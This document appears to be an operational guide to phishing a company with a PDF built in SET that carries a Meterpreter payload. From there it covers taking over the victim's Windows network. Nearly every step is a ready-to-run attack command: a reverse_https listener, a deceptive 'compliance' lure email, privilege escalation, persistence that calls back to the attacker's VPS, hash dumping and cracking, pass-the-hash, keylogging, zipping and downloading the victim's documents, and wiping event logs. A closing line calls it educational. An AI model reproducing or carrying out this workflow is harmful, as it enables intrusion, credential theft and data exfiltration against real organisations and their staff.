The Definitive Spearphish & Network Takeover Workflow
SSH into your VPS and start Metasploit:
msfconsole
Type these commands one by one:
use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set LHOST 0.0.0.0
set LPORT 443
exploit -j
The listener will run in the background waiting for connections.
On Parrot OS, open SET and follow this path:
1. sudo setoolkit
→ 2. Choose 2 - File-Format Attacks
→ 3. Choose 1 - PDF Embedded EXE
→ 4. Choose 13 - Adobe PDF Embedded EXE
When asked, provide a path to a legitimate PDF:
/path/to/Corporate_Compliance.pdf
This makes the file look real and trustworthy.
LHOST: Your VPS IP Address
LPORT: 443
SET saves to a hidden folder. You MUST move and rename it:
mv /root/.set/template.pdf
/home/user/Desktop/Compliance_Update.pdf
If you don't do this immediately, the file will be overwritten the next time you use SET!
In SET, navigate to:
1. sudo setoolkit
→ 2. Choose 1 - Social-Engineering Attacks
→ 3. Choose 5 - Mass Email Attack
→ 4. Choose 1 - Single Email Address
Use a burner Gmail account with an App Password:
Email: [email protected]
App Password: xxxxx xxxxx xxxxx xxxxx
/home/user/Desktop/Compliance_Update.pdf
"Important: All administrative staff must review the attached compliance update by EOD."
Make it sound urgent but professional!
When your target opens the PDF, a session will appear on your VPS. Connect to it:
sessions -i 1
Find a stable Windows process to hide in:
ps
Find explorer.exe in the list and note its PID (number)
migrate [PID]
Example: migrate 1234
getsystem
getuid
You should see NT AUTHORITY\SYSTEM - this means you have full control!
This ensures you can reconnect even after they restart:
run persistence -U -i 30 -p 443 -r [Your_VPS_IP]
Even if they shut down or restart, a new session will automatically appear on your VPS!
shell
query user
This shows who else is logged into the machine or network.
arp -a
Shows all IP addresses on the local network
net view
Shows shared computers on the network
net config workstation
Tells you if the computer is part of a corporate Domain.
exit
hashdump
The output looks like this:
Username:500:LM_HASH:NTLM_HASH:::
On modern Windows, the LM_HASH is always aad3b4... (empty/invalid). You need the NTLM_HASH (second long string).
Option A: Hashcat (GPU - FAST)
hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt
Option B: John the Ripper (CPU)
john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt
hashes.txt
If you can't crack the password, use the hash directly to login to other servers:
use exploit/windows/smb/psexec
set RHOSTS [Target_Server_IP]
set SMBUser [Username]
set SMBPass [The_NTLM_Hash_Only]
exploit
keyscan_start
Wait a few minutes for typing to accumulate...
keyscan_dump
shell
powershell Compress-Archive -Path C:\Users\Admin\Documents\*
-DestinationPath C:\Windows\Temp\data.zip
exit
download C:\Windows\Temp\data.zip /home/user/Loot/
clearev
Removes Windows Event Viewer logs
rm C:\Windows\Temp\data.zip
Deletes the zip file from their computer
| Goal | Command |
|---|---|
| System Info |
sysinfo
|
| Check Current User |
getuid
|
| Escalate Privileges |
getsystem
|
| List Running Processes |
ps
|
| Move into Process |
migrate [PID]
|
| Wipe Event Logs |
clearev
|
| Start Keylogger |
keyscan_start
|
| View Keylogger Data |
keyscan_dump
|
| Take Screenshot |
screenshot
|
| List Network Devices |
arp -a
|
| View Logged In Users |
query user
|
| Search for Files |
search -f *.pdf
|
| Create Tunnel to Internal Site |
portfwd add -l 8080 -p 80 -r [Internal_IP]
|
| Drop into Windows CMD |
shell
|
DISCLAIMER
This information is for educational purposes only. Unauthorized access to computer systems is illegal. Always have written authorization before testing.